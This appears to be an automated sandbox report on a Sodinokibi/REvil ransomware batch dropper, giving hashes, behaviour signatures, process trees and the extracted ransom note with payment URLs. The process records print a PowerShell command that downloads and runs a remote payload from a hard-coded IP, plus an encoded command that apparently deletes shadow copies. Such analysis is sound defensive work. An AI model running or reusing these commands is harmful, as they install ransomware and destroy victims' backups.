Analysis

  • max time kernel
    34s
  • max time network
    35s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    23-05-2020 16:10

General

  • Target

    aa924bdd41c78914cf9c258c5b04d440.bat

  • Size

    217B

  • MD5

    73b18c7ea72367714adfa391d407d44b

  • SHA1

    936cfb5cb7073a9e298eed93720a1e73b88b50b8

  • SHA256

    efb6eff4932c6a31030f3eff665d0228d063c0fc37fb274278e9ceb7e55f2fe8

  • SHA512

    60a9438888dc461e3c90e4df597bbe9420c700f1df7a62ede10b1e44a595336c948b4ec520a4589bc1f2f542d5c6e1b3388f55fead8501b40d843f3dbe3d3c98

Malware Config

Extracted

Language

ps1

Source

ps1.dropper

URLs

http://185.103.242.78/pastes/aa924bdd41c78914cf9c258c5b04d440

Extracted

Path

C:\62mfmn-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 62mfmn. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5B24DC294A8BCFD9 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/5B24DC294A8BCFD9 Warning: secondary website can be blocked, thats why first variant much better and more available. 
When you open our website, put the following data in the input form: Key: whvAJMjeBrBZ6CW24dL6Mx5qCrAL5QwwoIHmcaptmQGLEkYN5gakTy5GlEDrEDuO SzzWO99NwQwCGfP87xpsDwJvPK5G56MBMYUXDsMb/MDSSUMBgxc/Syex40PNi/Hk gPsPgKS+bsrxo5nzfzuWFBfkcBE00JYCRviTY6AtnJzo5tEH9W9DnORafbd1QeRn 7+xAMSnbsTRMaMXtulfQz3IIaveb5UpbUjnEhssxXOK6+a0m6HZgHGmWScrb6pjX /PRoG1epTli1xKG2fABox5o3a89ghklkewj/ZY7qsGJI57bdEIGZG+0B7ob7syMv SfsN4kG7/pduj343R8TXMJdTxvO5Svlb8K0AGXYgpSLB89Gz73l8YvPKCtwSXx5x 0yJi56DhmkGOFNC/ZWguIEsrfOgh0/vWq81VcQMSDIn1UfonoXheNuodoNmFTfwF eQ1eLAihbB3gikynMaifL2nT4J1kO+sFZjWYSiyZUBFkPCdVfszlXu07Tx4STgHj 5bTuKq6mZrxWB5tviFa/ICKxxPCcbHy5vog/KId3eFJ4ixk0xAXj0ABtLeUWyMkJ mDu58BeFPrx+8bmlKXQbgIrvb383lXparBfKI/n8Rz4QjsXQmr9N4Tcb2Q9OL3pq uhd6Md/utWwS6rEQNGfY4S+r8Ad7ZXtJBCxGT5CsDqG8QjJ+no4c90WzbkqeRcoq DUeqh/IhXtUWD8IkyK0fLBb75s4uZ48GLWX2S4q2fMNm3CAksAGcR9yGGuosYLjT I/FqJDQjcNh/R2TIfODslqtURF7XbHntb8TXd5jLZwRvIupmrt/UJHgv4UO1nzCC jkTbc41vog0VSzSpevbmK6obSdxNnm1xK3vQMRpAJxtbU1IE3SXLrV9/KYR4uq57 +sqQZjajaGj70SoHZp2YLyYhzLmxO54mXSPwm9BA5Aa4+EAOaPK5AloV7Kchs8Ip +Vu8SCOFtrh2r//muGPCsllW2Y3hRyzat1yJ0vbc6JBgGT79WK8i/qLFDtPscfZC NVUteuB4vfgqZmEbIQFz0kXd7eqKQLp7tES6ZTB5duEGIf64ejicZNVEVTYUceYe jDPDm9i1gEwsrnvZ7vlClPQoNm0J7h70OyxG4aDJ0ZKOodaQpWi1R/VPfjyurEnT XZyuKr7JzJXxjXsMQ1P26O5OJT9ED2vUiZroshTu2usQBRz9x75ppfqpu3tZShFL wUZeQxHu3QZX2G3EIuWPHpXBWotzg5Ys/LD1/TF4krj7O4zHSmd6Pf3daXpevhR4 zUtucKw6u/t0fkVOash4210SN/6A3s5Nsu3lMDf48No= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5B24DC294A8BCFD9

http://decryptor.cc/5B24DC294A8BCFD9

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 77 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Drops file in Program Files directory 30 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\aa924bdd41c78914cf9c258c5b04d440.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1052
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/aa924bdd41c78914cf9c258c5b04d440');Invoke-JYKVBWWUMA;Start-Sleep -s 10000"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Drops file in Program Files directory
      • Sets desktop wallpaper using registry
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:1312
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:784
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1780

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms